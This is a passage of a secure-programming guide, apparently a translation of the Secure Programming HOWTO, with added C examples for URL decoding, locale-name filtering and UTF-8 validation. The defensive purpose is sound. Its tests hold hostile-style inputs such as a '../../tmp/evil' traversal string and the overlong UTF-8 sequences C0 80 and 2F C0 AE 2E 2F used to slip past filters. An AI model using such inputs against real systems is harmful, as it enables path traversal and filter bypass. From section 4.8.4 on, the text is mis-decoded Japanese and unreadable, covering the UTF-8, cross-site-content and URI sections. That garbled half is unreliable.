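{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;                     /* includes '\0', so a truncated "%X" fails safely */
}

/* Decode URL-encoded input ONCE into out (NUL-terminated). Returns the
 * decoded length, or -1 if an escape is malformed, if the decoded text
 * contains a control character (NUL, newline, CR, ... or DEL), or if the
 * result does not fit in outsz bytes. */
long url_decode_once(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        unsigned char c = (unsigned char)in[i];
        if (c == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[i + 2]);
            if (hi < 0 || lo < 0)
                return -1;                       /* "%", "%2", "%zz" */
            c = (unsigned char)(hi * 16 + lo);
            i += 2;
        } else if (c == '+') {
            c = ' ';                              /* form encoding of a space */
        }
        if (c < 0x20 || c == 0x7F)
            return -1;                            /* %00, %0A, %0D, raw controls */
        if (o + 1 >= outsz)
            return -1;                            /* would overflow out */
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return (long)o;
}

int main(void)
{
    char buf[32];
    /* "%2500" decodes to the literal text "%00" and must stay that way. */
    return (url_decode_once("%2500", buf, sizeof buf) == 3 && strcmp(buf, "%00") == 0
            && url_decode_once("%00", buf, sizeof buf) == -1) ? 0 : 1;
}
```

The decoded string still has to pass whatever whitelist applies to the field it belongs to (a filename, a locale name, a number); this routine only settles the representation question so that the later check sees the same bytes the application will use.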

 

4.6. Other Inputs

Programs must ensure that all inputs are controlled; this is particularly
difficult for setuid/setgid programs because they have so many such inputs.
Other inputs programs must consider include the current directory, signals,
memory maps (mmaps), System V IPC, and the umask (which determines the
default permissions of newly created files). Consider explicitly changing
directories (using chdir(2)) to an appropriate directory, specified with an
absolute pathname, at program start-up.

 

4.7. Human Language (Locale) Selection

As more people have computers and the Internet available to them, there has
been increasing pressure for programs to support multiple human languages
and cultures. This combination of language and other cultural factors is
usually called a "locale". The process of modifying a program so it can
support multiple locales is called "internationalization" (i18n), and the
process of providing the information for a particular locale to a program is
called "localization" (l10n).

Overall, internationalization is a good thing, but this process provides
another opportunity for a security exploit. Since a potentially untrusted
user provides information on the desired locale, locale selection becomes
another input that, if not properly protected, can be exploited.

 

4.7.1. How Locales are Selected

In locally run programs (including setuid/setgid programs), locale
information is provided by environment variables. Thus, like all other
environment variables, these values must be extracted and checked against
valid patterns before use.

For web applications, this information can be obtained from the web browser
(via the Accept-Language request header). However, since not all web
browsers pass this information properly (and not all users configure their
browsers properly), it is used less often than you might think. Often, the
language requested by a web browser is simply passed in as a form value.
Again, these values must be checked for validity before use, as with any
other form value.

In either case, locale information is really just a special case of the
general problem discussed in this section: the input must be validated
before being used. However, this input is rarely considered, so it is
discussed separately here. Combined with the issue discussed next (handling
of the message catalogs), a locale value that is not validated can let an
attacker make other programs execute arbitrary commands or read data they
should not.

 

4.7.2. Locale Support Mechanisms

There are two major library interfaces for supporting locale-selected
messages on Unix-like systems, one called "catgets" and the other called
"gettext". In the catgets approach, every string is assigned a unique
number, which is used as an index into a table of messages. In contrast, in
the gettext approach, a string (usually in English) is used to look up a
table that translates the original string. catgets(3) is an accepted
standard (via the X/Open Portability Guide, Volume 3, and the Single Unix
Specification), so it is possible your program wants to use it. The
"gettext" interface is not an official standard (though it was originally a
UniForum proposal), but I believe it is the more widely used interface (it
is used by Sun and essentially all GNU programs). [Translator's note: for
UniForum, see http://www.uniforum.org/.]

In theory, catgets should be slightly faster, but this is at best marginal
on today's machines, and the bookkeeping effort of keeping unique
identifiers valid in catgets() makes the gettext() interface much easier to
use. I suggest using gettext(), just because it is easier to use; with
gettext() the original text remains readable in the source. However, don't
take my word for it; see GNU's documentation on gettext
(info:gettext#catgets) for a longer comparison.

The catgets(3) call (and friends) has an implied use of the environment
variable NLSPATH, which identifies a set of directories for localized
message files. The GNU C library ignores NLSPATH for setuid/setgid programs,
which protects programs that use it, but it doesn't protect programs that
use catgets() and aren't setuid/setgid (such as CGI scripts).

The widely used "gettext" interface, at least as far as I know, isn't
vulnerable to a maliciously set NLSPATH. However, I have been unable to get
a satisfactory answer about the effect of maliciously set LC_ALL and
LC_MESSAGES values, and gettext's cat-compat.c uses the bindtextdomain()
routine, which does depend on NLSPATH.

 

4.7.3. Legal Values

For the moment, if you must permit untrusted users to set information on
their desired locales, make sure the provided internationalization
information meets a narrow filter that only permits legitimate locale
names. For user programs (especially setuid/setgid programs), this means
checking the following environment variables: NLSPATH, LANGUAGE, LANG, the
old LINGUAS, LC_ALL, and the other LC_* values (LC_MESSAGES, but also
LC_COLLATE, LC_CTYPE, LC_MONETARY, LC_NUMERIC, and LC_TIME). For web
applications, this means the value from the Accept-Language request header
or a related form value (the application should use the Content-Language:
header to indicate the actual language of the data returned). If users
cannot set your environment variables (that is, for setgid/setuid
programs), this filter can be part of your filtering of environment
variables; otherwise (for example, for CGI scripts) it can be part of your
input filtering. GNU's C library ("glibc") will not accept a LANG value in
setgid/setuid programs if it contains a "/", but there have been errors in
these filters (for example, Red Hat had to update glibc on September 1,
2000, to fix such a bug). This kind of filtering is not required by
standards, so adding your own filtering makes your program safer.
Requirements on locale settings are actually somewhat murky, so I will give
some advice based on my own experience.

First, a few words about the legal values of these settings. Locales
generally use IETF RFC 1766 standard tags (a two-letter country code as the
primary tag, optionally followed by dash-separated subtags; in environment
variables an underscore is used instead). To be more precise, three-letter
country codes may also be used. There are also two formats for extension
modules, which are not compatible with each other: the X/Open format and
the CEN (European Community Standard) format; both should be permitted.
Typical values are "C" (the C locale), "EN" (English), and "FR_fr" (French
using the territory of France's conventions). Also, since non-standard
values may be used, your program may need an "alias" mechanism, in which a
non-standard value is mapped to a standard one (GNU gettext uses
/usr/share/locale/locale.alias, and X11 uses
/usr/lib/X11/locale/locale.alias; note that the file is sometimes called
"aliases" instead of "alias"). In any case, the result is the same:
libraries like gettext() have to accept these aliases and apply the most
appropriate value. See FSF [1999] and the li18nux.org web site for more
information. Filters should reject values that are not needed; in
particular, "/" (which could escape from the trusted directory) and ".."
(which moves to the parent directory) must not be permitted. Other
dangerous characters in NLSPATH include "%" (which indicates substitution)
and ":" (the directory separator). Other systems may use such characters
for special purposes, so rejecting them is the safer course.

 

4.7.4. Bottom Line

In short, I suggest simply erasing or resetting NLSPATH, unless you have a
trusted user supplying the value. For the Accept-Language header in HTTP
(if you use it), form values specifying the locale, and the environment
variables LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_* values
listed above, filter the locales from untrusted users to permit null
(empty) values, or only values that match in their entirety this regular
expression (note that I have recently added "="):

 [A-Za-z][A-Za-z0-9_,+@\-\.=]*

I haven't found any legitimate locale that doesn't match this pattern, but
the pattern does appear to protect against locale attacks. Of course, there
is no guarantee that messages are available in the requested locale, but in
that case these routines will fall back to the default messages (usually in
English), which at least is not a security problem.

If you wish to be really picky, and only permit the locale names defined by
li18nux, you can use this pattern instead:

 ^[A-Za-z]+(_[A-Za-z]+)?
 (\.[A-Z]+(\-[A-Z0-9]+)*)?
 (\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
  (,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$

In both cases, these patterns use POSIX's extended ("modern") regular
expression notation (see regex(3) and regex(7) on Unix-like systems).

Of course, languages cannot be supported without a standard way to
represent their written symbols, which brings us to the issue of character
encoding.
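Both patterns can be applied with the POSIX regex(3) routines the text refers to. The C code below is an added example for this edition (not from the HOWTO): it compiles the two expressions as extended regular expressions and wraps them in two predicates, one lenient and one strict. Two transcription details are assumptions of mine: inside a bracket expression a backslash is an ordinary character in POSIX ERE, so the bracket sets are written without the backslashes shown above, and "\@" / "\=" are written as plain "@" / "=" (ERE treats them the same). The li18nux pattern is otherwise kept exactly as printed, including its requirement that a modifier be written as "name=value".

```c
#include <regex.h>
#include <stddef.h>

/* The simple pattern: letter first, then a small safe set. No "/", "..", "%"
 * or ":" can get through. */
static const char SIMPLE_LOCALE_RE[] = "^[A-Za-z][A-Za-z0-9_,+@.=-]*$";

/* The li18nux naming pattern, joined into one ERE. */
static const char LI18NUX_LOCALE_RE[] =
    "^[A-Za-z]+(_[A-Za-z]+)?"
    "(\\.[A-Z]+(-[A-Z0-9]+)*)?"
    "(@[A-Za-z0-9]+(=[A-Za-z0-9-]+)"
    "(,[A-Za-z0-9]+(=[A-Za-z0-9-]+))*)?$";

/* Compile, match the whole string, free. Returns 1 on match, 0 otherwise
 * (including when the pattern fails to compile: fail closed). */
static int matches_ere(const char *pattern, const char *s)
{
    regex_t rx;
    if (regcomp(&rx, pattern, REG_EXTENDED | REG_NOSUB) != 0)
        return 0;
    int rc = regexec(&rx, s, 0, NULL, 0);
    regfree(&rx);
    return rc == 0;
}

/* Lenient check from the text: empty (unset) is fine, otherwise the simple
 * pattern must match the entire value. */
int locale_value_is_acceptable(const char *value)
{
    if (value == NULL || value[0] == '\0')
        return 1;
    return matches_ere(SIMPLE_LOCALE_RE, value);
}

/* Strict check: only names of the form li18nux defines. */
int locale_value_is_li18nux_name(const char *value)
{
    return value != NULL && matches_ere(LI18NUX_LOCALE_RE, value);
}

int main(void)
{
    return (locale_value_is_li18nux_name("en_US.UTF-8")
            && !locale_value_is_acceptable("../../tmp/evil")) ? 0 : 1;
}
```

Run the check on every one of the variables listed above before calling setlocale() or any message catalog routine; a value that fails should be dropped (unset), not "fixed up", so the library falls back to the default locale.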

 

4.8. Character Encoding

4.8.1. Introduction to Character Encoding

For many years Americans have exchanged text using the ASCII character set;
since essentially all U.S. systems support ASCII, this permits easy exchange
of English text. Unfortunately, ASCII is completely inadequate for handling
the characters of nearly all other languages. For many years different
countries have adopted different techniques for exchanging text in different
languages, making it difficult to exchange data in an increasingly
interconnected world.

More recently, ISO has developed ISO 10646, the "Universal Mulitple-Octet
Coded Character Set (UCS)". UCS is a coded character set which defines a
single 31-bit code for each character. The first 65536 characters of the
UCS (which thus fit into 16 bits) are termed the "Basic Multilingual Plane"
(BMP), and the BMP is intended to cover nearly all of today's spoken
languages. The Unicode consortium develops the Unicode standard, which
concentrates on the UCS and adds some additional conventions to aid
interoperability. Historically, Unicode and ISO 10646 were developed by
competing groups, but thankfully they realized that they needed to work
together and now coordinate with each other.

If you are writing new software that handles internationalized characters,
you should be using ISO 10646/Unicode as your basis for handling
international characters. However, you may need to process older documents
in various older (language-specific) character sets, in which case you need
to ensure that an untrusted user cannot control the character set encoding
of the document (since this could affect the conversion of the document).

 

4.8.2. Introduction to UTF-8

Most software is not designed to handle 16-bit or 32-bit characters, yet to
create a universal character set more than 8 bits was required. Therefore,
a special format called "UTF-8" was developed to encode these potentially
international characters in a format more easily handled by existing
programs and libraries. UTF-8 is defined, among other places, in IETF RFC
2279, so it is a well-defined standard that can be freely read and used.
UTF-8 is a variable-width encoding; characters numbered 0 to 0x7f (127)
encode to themselves as a single byte, while characters with larger values
are encoded into 2 to 6 bytes (depending on their value). The encoding was
specially designed to have the following nice properties (this information
is from the RFC and the Linux utf-8 man page):

  * The classical US ASCII characters (0 to 0x7f) encode as themselves, so
     files and strings which contain only 7-bit ASCII characters have the
     same encoding under both ASCII and UTF-8. This is fabulous for
     backward compatibility with the many existing U.S. programs and data
     files.

  * All UCS characters beyond 0x7f are encoded as a multibyte sequence
     consisting only of bytes in the range 0x80 to 0xfd. This means that
     no ASCII byte can appear as part of another character. Many other
     encodings permit characters such as an embedded NIL, causing programs
     to fail.

  * It is easy to convert between UTF-8 and the 2-byte or 4-byte
     fixed-width representations of characters (called UCS-2 and UCS-4
     respectively).

  * The lexicographic sorting order of UCS-4 strings is preserved, and the
     Boyer-Moore fast search algorithm can be used directly on UTF-8 data.

  * All possible 2^31 UCS codes can be encoded using UTF-8.

  * The first byte of a multibyte sequence representing a single non-ASCII
     UCS character is always in the range 0xc0 to 0xfd, and it indicates
     how long the multibyte sequence is. All further bytes in a multibyte
     sequence are in the range 0x80 to 0xbf. This allows easy
     resynchronization: if a byte is missing, it is easy to skip forward to
     the "next" character, and it is always easy to move forward or back
     to the "next" or "previous" character.

In short, the UTF-8 transformation format is becoming a dominant method for
exchanging international text because it can support all of the world's
languages, yet it is backward compatible with US ASCII files and has other
nice properties as well. For many purposes I recommend its use,
particularly when storing data in a "text" file.

 

4.8.3. UTF-8 Security Issues

The reason to mention UTF-8 is that some byte sequences are not legal
UTF-8, and this might be an exploitable security hole. UTF-8 encoders are
supposed to use the "shortest possible" encoding, but naive decoders may
accept encodings that are longer than necessary. Indeed, earlier standards
permitted decoders to accept "non-shortest form" encodings. The problem is
that potentially dangerous input can then be represented in multiple ways,
and thus might defeat the security routines checking for dangerous inputs.
The RFC describes the problem this way:

    Implementors of UTF-8 need to consider the security aspects of how
    they handle illegal UTF-8 sequences. It is conceivable that in some
    circumstances an attacker would be able to exploit an incautious UTF-8
    parser by sending it an octet sequence that is not permitted by the
    UTF-8 syntax.

    A particularly subtle form of this attack could be used against a
    parser which performs security-critical validity checks against the
    UTF-8 encoded form of its input, but interprets certain illegal octet
    sequences as characters. For example, a parser might prohibit the NUL
    character when encoded as the single-octet sequence 00, but allow the
    illegal two-octet sequence C0 80 and interpret it as a NUL character.
    Another example might be a parser which prohibits the octet sequence
    2F 2E 2E 2F ("/../"), yet permits the illegal octet sequence 2F C0 AE
    2E 2F.

A longer discussion about this is available in Markus Kuhn's UTF-8 and
Unicode FAQ for Unix/Linux at http://www.cl.cam.ac.uk/~mgk25/unicode.html.

 

4.8.4. UTF-8 ̐l

܂AUTF-8 ͂ƂĎ󂯕tꍇ́A̓͂ UTF-8 Ȃ
`FbNKv܂Bŋꗗ́A UTF-8 
ׂĂłB̃e[uɃ}b`Ȃ΁AƂ͌܂
BL̃e[u 1 Ԗڂ̃J UTF-8 ɃGR[he핶R[
hłB 2 Ԗڂ͕ǂ̂悤ɃoCiɃGR[h邩Ă
Buxv̓f[^邱(0  1)܂AŒZGR[hłȂ
ɂ͔F߂ׂłȂP[X܂BṒAꂼ̃oCg
鐳l(16 i\)łBāAX̕ẼJ̃p^
̂ǂɓĂ͂܂̂AvOŃ`FbNKv܂Bu-v
͐l͈̔([܂)\킵Ă܂BA񂪐
UTF-8 ̕łƌƂŁA󂯓ėǂƂ͌܂(
̑̃`FbNKv)AʁÃ`FbNO UTF-8 ̐`
FbNKv܂B
 

Table 4-1. Legal UTF-8 Sequences


UCS Code (Hex)      Binary UTF-8 Format   Legal UTF-8 Values  
                                          (Hex)               

00-7F               0xxxxxxx              00-7F               

80-7FF              110xxxxx 10xxxxxx     C2-DF 80-BF         

800-FFF             1110xxxx 10xxxxxx     E0 A0*-BF 80-BF     
                    10xxxxxx                                  

1000-FFFF           1110xxxx 10xxxxxx     E1-EF 80-BF 80-BF   
                    10xxxxxx                                  

10000-3FFFF         11110xxx 10xxxxxx     F0 90*-BF 80-BF     
                    10xxxxxx 10xxxxxx     80-BF               

40000-FFFFFF        11110xxx 10xxxxxx     F1-F3 80-BF 80-BF   
                    10xxxxxx 10xxxxxx     80-BF               

100000-10FFFFF      11110xxx 10xxxxxx     F4 80-8F* 80-BF     
                    10xxxxxx 10xxxxxx     80-BF               

200000-3FFFFFF      111110xx 10xxxxxx     too large; see below
                    10xxxxxx 10xxxxxx                         
                    10xxxxxx                                  

04000000-7FFFFFFF   1111110x 10xxxxxx     too large; see below
                    10xxxxxx 10xxxxxx                         
                    10xxxxxx 10xxxxxx                         
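
The "Legal UTF-8 Values" column of Table 4-1 written out as a validator, as an added example that is not part of the original document. The function and type names are mine; the byte ranges are exactly the table's, so overlong forms such as C0 80 and E0 80 80, values above 10FFFF (F4 90 80 80) and the 5/6-byte leads marked "too large" are all rejected, while the table's silence on the UTF-16 surrogate range is kept as-is.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Legal range for one byte position of a UTF-8 sequence (inclusive). */
struct byte_range { uint8_t lo, hi; };

/* Classify lead byte b according to Table 4-1.  Returns the number of
 * continuation bytes that must follow (0..3), or -1 if b cannot start a
 * legal sequence: stray continuation bytes 80-BF, the overlong leads C0-C1,
 * F5-F7 (above 10FFFF), the 5/6-byte leads F8-FD ("too large" in the table)
 * and FE-FF.  *first receives the legal range of the first continuation
 * byte; that is where the table's starred bounds (A0 after E0, 90 after F0,
 * 8F after F4) are enforced. */
static int utf8_lead(uint8_t b, struct byte_range *first)
{
    first->lo = 0x80; first->hi = 0xBF;             /* default: plain 10xxxxxx */
    if (b <= 0x7F)              return 0;
    if (b >= 0xC2 && b <= 0xDF) return 1;
    if (b == 0xE0)              { first->lo = 0xA0; return 2; }
    if (b >= 0xE1 && b <= 0xEF) return 2;
    if (b == 0xF0)              { first->lo = 0x90; return 3; }
    if (b >= 0xF1 && b <= 0xF3) return 3;
    if (b == 0xF4)              { first->hi = 0x8F; return 3; }
    return -1;
}

/* Scan len bytes.  Returns -1 if every sequence is legal under Table 4-1,
 * otherwise the offset of the first offending byte (len if the input ends
 * in the middle of a sequence).  Like the table, this does not exclude the
 * UTF-16 surrogate range ED A0-BF xx; add that check if you need it. */
long utf8_first_illegal(const uint8_t *s, size_t len)
{
    size_t i = 0;
    while (i < len) {
        struct byte_range first;
        int n = utf8_lead(s[i], &first);
        if (n < 0) return (long)i;
        if (len - i - 1 < (size_t)n) return (long)len;      /* truncated */
        for (int k = 1; k <= n; k++) {
            uint8_t c  = s[i + k];
            uint8_t lo = (k == 1) ? first.lo : 0x80;
            uint8_t hi = (k == 1) ? first.hi : 0xBF;
            if (c < lo || c > hi) return (long)(i + k);
        }
        i += (size_t)n + 1;
    }
    return -1;
}

/* Convenience wrapper for NUL-terminated input: 1 = legal, 0 = illegal. */
int utf8_is_legal(const char *s)
{
    return utf8_first_illegal((const uint8_t *)s, strlen(s)) < 0;
}

int main(void)
{
    /* Constructed sample: "/../" with the overlong C0 AE standing in for '.' */
    const uint8_t overlong[] = { 0x2F, 0xC0, 0xAE, 0x2E, 0x2F };
    printf("\"/../\" legal: %d\n", utf8_is_legal("/../"));
    printf("2F C0 AE 2E 2F: first illegal byte at offset %ld\n",
           utf8_first_illegal(overlong, sizeof overlong));
    return 0;
}
```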

 

ɐGꂽ悤ɁAWɂ ISO 10646AUnicode Ƃ 2 ̋Ki
܂Å蓖ĂɊւĂ͓Ă܂BAISO/IEC
10646-1:2000  IETF RFC ɂ UTF-8 ̒`ł́A5A6 oCg
GR[hT|[gĂA Uniforum  Unicode ͈̔͊OɃG
R[hĂ܂B̂悤ȒĺAUnicode ƂĂ̓T|[g
ĂȂ̂ŁAISO 10646 ̏̃o[Włl̐󂯂
Ǝv܂B܂A5A6 oCg UTF-8 ̃GR[hP[X
قƂǖAʏ͋ۂȂ΂܂(ʂȖړI)B

l͈̔͂肷͍̂łBĎۂ̃hLg̏
̔łł́AԈڂLڂĂ܂(镶
܂ĂP[X܂)BJ҂́ACuɐ UTF-8
̒l`FbN@\Kv܂B`FbN𐳂ŝ
ƂĂȂ̂ŁB

ꍇɂāA16 i C0 80 ɑ΂āAقǃVrAɂȂ(
͓ŉƂ)P[X邩ȂAƂ_Ă܂
B͒镶ŁAĂ܂ ASCII  NUL(NIL)ɑ
ƂɂȂ܂BC  C++ ł NIL ʏ̕ɓĂ܂Ƃ
ȂƂɂȂ܂̂ŁAf[^Xg[̈ꕔƂ NIL \
ɁA̕тpP[X܂BJava ł͂̑𐳎ɋLڂ
Ă܂Bf[^sɁAIɂ C0 80 DɈĂ
BAɌƁÃf[^ۑO 00 ɕϊKv
܂BKvɂ܂AuVrAɂȂ炸ɁvAC0 80  UTF-8 
f[^Xg[ƂĔF߂Ă悢܂BZLeBɉe
łȂȂA^pƂϓ_ŋ̂͂悢ĂƎv܂B

̑Ώ͔łB Unicode tH[ŊJ C ɂϊ[`
𒲍ȂA ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/
ConvertUTF.c 𗘗pĂ݂Ă͂ǂł傤B̃[`I[v\[
Xǂ͂肵܂̂(CZXǂłAC\ǂ
܂)A̓_͒ӂĂB

 

4.8.5. UTF-8 ֘Aɂ

̃ZNVł UTF-8 _܂BUCS őoCgGR[ĥ
łʓIŁAe̍ۉeLXgȒPɈ邩łB
AꂾGR[hłȂ̂łB̃GR[hƂ
UTF-16  UTF-7 ̂悤ȃGR[hAlȖĂ܂̂
A悤ȗRŌ؂Ȃ΂܂B

 1 ̖ƂāA̕\@ŕ\̂ ISO 10646  Unicode
ɂ_łBƂ΁AANZg̒ɂ 1 (ANZgt)
\ł̂܂Ȃgݍ킹(Ƃ΁Ax[XɂȂ镶
ɃANZĝ) ŕ\ł̂܂B 2 ̌`́A
ł邩܂BȂXy[X}ʁAقȂ̂
ړ悤Ɍ邱Ƃ܂B̂悤ȉBꂽeLXg݂
󋵂ɂāAvOɉeo_ɒӂ𕥂ĂB͈
ؓł͍sȂłBvÓA̕ǂ̂悤ɕ\
̂SɏĂNCAgɑ΂āÂ悤Ȃ
ĂȂꍇ唼ł(NCAg̃tHg\AJ[
ɈˑĂ̂)B

 

4.9. TCgɂ܂ӂRec(Cross-site Malicious Content)
h

MłȂ[Ũf[^󂯕tāÃf[^̃[Uɓn
vO܂BԖڂ̃[ŨAvP[VAɂ
Ă͂̃[UɂƂĖfɂȂ鏈邩܂B Web A
vP[Vł͂肪ȖłB̖TCgɂ܂
Rec(Cross-site Malicious Content)ƌĂԂƂɂ܂B܂
A(tH[f[^܂)K`FbNāAtB^邩AG
R[h邩ȂƂ܂Bڂ́ASection 6.15 Ă
B

ƂāAWeb AvP[Vւׂ̓͂͂āAtB^(
̖N폜)AGR[h(̖N
NȂ悤ɃGR[h)A؂(mɁuSȁvf[
^ʉ߂悤ɂ)Ȃ΂ȂƂӖ܂BtB^
O⌟؂́A͎ɏI点ǂ̂ʂłAGR[h
͎ło͎łς܂܂B͂Ƀf[^ʂĂ܂
A͎Ƀf[^GR[hǂƎv܂(YȂł傤
)Bf[^ĂȂAGR[h͎ł͂Ȃo͎
_ɂẮA܂ǂ炪悢_oĂ܂B

 

4.10. ĕ\\̂ HTML  URI ɂ̓tB^

TCgɂ܂ӂRec(Cross-site Malicious Content)h
Ȃ΂ȂȂIȃP[X 1 ɁAWeb AvP[V
܂B Web AvP[V́A郆[U HTML  XHTML 
A𑼂̃[Uɓn悤ɐ݌vĂ܂(ڂ 
Section 6.15 Ă)BL̃TuZNVł́Aɂ̎̓
͂̃tB^OɂĘ_܂BP[XKv
OɂȂĂłB

 

4.10.1. HTML f[^폜ւ肷

(X)HTML ^Oł邾폜΁AłSɂȂ܂B΁A^
Oɂe͉N炸A܂̂rIȒPłBȑOwE
悤ɁÄꗗmFĂ͂łÄꗗɂȂ
ۂA폜ł͂łB̈ꗗɍڂĂ
ƂāAPɂ̃tB^֎̕Ă͂܂B̕
Ƃ́u<vu>vAu&v(ɎgȂdṕu"v)łBu
EU HTML ̎dlɏ]ē삷邾ȂAu>v͍폜Kv͂
BAۂ͍폜Ȃ΂܂BŔAJnu<v
̃y[W̒҂{͒uAƐĂuEU邩
łB́u菕vAU҂ɂޗ]n^āAu>vgāu
<vƂ]܂ȂĂ܂܂B 

W HTML őɂ́Aʏ ISO-8859-1(ۉeLXg𑗂鎞ł
) g܂BătB^͐䕶(s^u͕ʂ OK)̂
ƂǂƃnCrbgɂ镶폜ׂłB

̂ŖɂȂ̂ 1 ́AۉeLXg͂[U
̃eLXgmȂɏĂ܂Aт肷Ƃ_łB
ȕ̌xȂ폜ƁÃf[^͊SɂȂȂAɂ
čč\̂悤܂BI 1 ƂāÂ悤ȕ
~ŁAgƂ[UɃG[bZ[W𑗂ԂĂ
@܂BȂƂŃ[UɌxo܂A[U]
ł@\񋟂ł킯ł͂܂B̑ɂ́Ãf[^G
R[h@ƌ؂@܂BɂĂ͎ɋc_
܂B

 

4.10.2. HTML f[^GR[h

ɂقڈSȕ@ƂāA댯ȕϊĂ܂AHTML ňӖ
AƂ̂܂BׂẮu<vu&lt;vɁAu>vu&gt;v
ɁAu&vu&amp;vɂĂ܂΂IłBۉȂǂu&#
value;vƂ`gāALatin-1 ɃGR[hł܂BŌ̃Z~R
YȂłBRA̓GR[hǂ邩𗝉Ă
Ȃ΂΁Aۉ̃GR[h͂ł܂B

ōl댯ɂ́AGR[hʂ܂ 2 񏈗Ɛ
コ܂Ă܂AƂۂ܂B̂ł́A
ȂƂ͂́uړIvł̂󂯂Ƃ[Uɓ`܂
B

 

4.10.3. HTML f[^؂

AvP[Vׂċ@\ߒŁAHTML O҂󂯕tȂ
΂Ȃ炸A̎󂯕teʂ̃[Uɑ΂đꍇ܂B
͗pSȂ΂܂BȂ́AƂĂȂnĂ܂
B{ɂ邱ƂKvȂ̂A⎩ĂBƂ
 HTML 󂯓AƂlłAZLeBɐʂlX
Ԃł͎^ۗ_łBȂȂA擾̂͋ɂ߂čłB

AAvP[V HTML 󂯂𓾂AXN𕉂̉
lƎv̂ȂAȂƂ HTML ́uSȁvR}ḧꗗmF
ĂÃR}h悤ɂĂB

S HTML ^OŃAvP[V(QXgubN̂悤)ɂƂĖɗ
̂Œɂ܂BȒPȃRgĂ܂B <p>
(pOt)A <b> ({[h)A <i> (C^bN)A <em> ()A
<strong> (ɋ)A <pre> (Oɐ`ĂeLXg), <br> (
sBp̃^O͕Kv܂) LɑΉďI^O܂B

́uSȁvHTML R}hQ󂯓邾ł͂ȂA炪
qɂȂĕĂ(܂AHTML R}huΉƂĂv) 
ɕKĂB XML ł́Au`(well-formed)vf[^
Ăł܂BW HTML ĂȂAOł傤(Ƃ
΁A<p> oĂÔƂ </p> z肷͖̂ȂƎv܂)B
AHTML ł\ׂ(ΉƂ邽߂̕p^Oł
ꍇ)󂯓悤Ƃ̂́AAvP[V唼ɂƂĕKv
͂܂BƂ͂茾ƁAXHTML(HTML ̂) ɒł
ƂȂA`KvłB܂AHTML ^O͑啶A
܂B^O͑啶łAłAĎgĂ܂܂B
AXHTML 󂯓ȂA^Oׂ͂ďɂȂ΂
܂(XML ͑啶Aʂ܂BXHTML  XML gA^O
ł邱ƂKvł)B

ł TIPS słĂ܂Bʏ́AHTML eLXgy
ׂ^ȌWɊւ鉽̐݌vsȂǂł傤B
΁AeꂽeLXguCvTCg̃eLXgƂČ
ȂȂ܂(Uh܂)BǂȑȂ^Cvl
`FbN邱ƂȂɎ󂯓Ă͂܂B Javascript ̂悤ɁA
[UguɊދꂪ鑮񂠂܂B̑
T|[gKv܂BL̈ꗗɂ́A܂݂
ƂɒڂĂBꂪSAmȕ@Ȃ̂łBSł͂Ȃ
^OgꂽȂA炭xbZ[Woǂł傤B
ꂪIłȂȂA댯ȕGR[h(Ƃ΁u<v
u&lt;vɂ)A[ÜSێAf[^ȂȂ邱Ƃ͖h
B

 

4.10.4. nCp[eLXgN(URI  URL)؂

Ӑ[Ȃ炨CÂƎv܂AnCp[eLXg̃N^O <a>
S HTML ^OƂ͂Ă܂B炩ɁA<a href="safe uri">(nC
p[eLXgN)SȈꗗɒǉł̂ɂ炸ł(e
`FbNȂÂǂ̑Ȃ)BAvP[VK
vƂĂȂAǉĂ܂܂BO҂N𒣂邱
ƂŁASɒቺ܂BŔAuS URIv̒`ɂ܂
B[1] ꂪʓIɂ͂ƂĂʓ|ɂȂ܂B̃uEÚA[U
ɂƂĊ댯Ȃ URI ׂĎ󂯎Ă܂łB
̃ZNVł́AO҂ėāA̐lɍĕ\ URI ̌
@ƁA URI  HTML ɂǂ̂悤ɑgݍނɂĘ_܂B

܂ URI ̕@ƌčs܂傤(܂܂ȎdlŒ`Ă
̂)B URI ́u΁vu΁v\łB URI ͂̂悤ɂȂ
B

scheme://authority[path][?query][#fragment]                            

URI ̓XL[(uhttpv̂悤)͂܂Au://vAӔCҕ
(authority)A (uwww.dwheeler.comv̂悤)ApX(fBNgt@
Ĉ悤) Ƒ܂B̌ɋ^╄uăNGAn
bV(u#v)uătOgʎq肵܂BIvV
 [] ň͂ł܂Bɂ́ANGtOg܂ URI 
͂܂BXL[ɂ́AȂf[^(Ƃ΃pXNGA
tOg)AŗL̏ǉꍇ񂠂܂BX
L[́uӔCҕvɃIvVŃ[UpX[hA|[gԍ
Ăꍇ悭܂B͎̒ʂłB

 [username[:password]@]host[:portnumber]                               

uhostv͖O(uwww.dwheeler.comv) IPv4 ̐l`̃AhX
(127.0.0.1) wł܂Bu΁vURI ͂IuWFNgú݂v
IuWFNg̑ΈʒuŎQƂȀ̓t@CɂƂĂ悭
Ă܂B

path[?query][#fragment]                                                

Ă URI ł́AĂ镶ɐA̖
߂ 8 rbguURL GR[hv %hh(hh ɂ 8 rbg
16 i̒lœ܂) Ƃ܂B URI ɂāAɏڂ
IETF RFC 2396 ƂɊ֘AKiĂB

܂ URI ̏Ă܂̂ŁAǂ͂ꂼ̕
𒲂ׂĂ݂܂傤B

 E XL[FXL[̑啔͎Ɋ댯łBujavascriptv܂ރXL
    [}ł悤ɂĂ܂ƁAƂT[rXۍU
    邱ƂɂȂĂ܂܂(Ƃ΁AEChE쐬JԂ
    ƂŁA[Ũ}Vt[YāApłȂȂ܂)BƐ[
    Ȃ̂́Ajavascript ̎ɂm̐Ǝ㐫U鋰ꂪ
    _łBXL[ɂ́umailto:v̂悤ɁA[o肪Ȃ
    oĂ܂̂ANCAg}Vŏ\ɈSmۂ
    Ȃ̂܂B܂ÄSȃXL[Ɍ肵āA
    XL[Kv܂B
   
 E ӔCҕF~΁A[Uɂ́uSȁvTCgւ̃N
    ǂł傤B͌IɂƂĂłB
    A[UpX[hA|[gԍɑ΂ĉłȂ΂
    ܂B֎~ׂȂ̂łB[U(Ƃ킯pX[hƂȂ
    )KvƂĂVXe͂炭dvȏK[hĂ
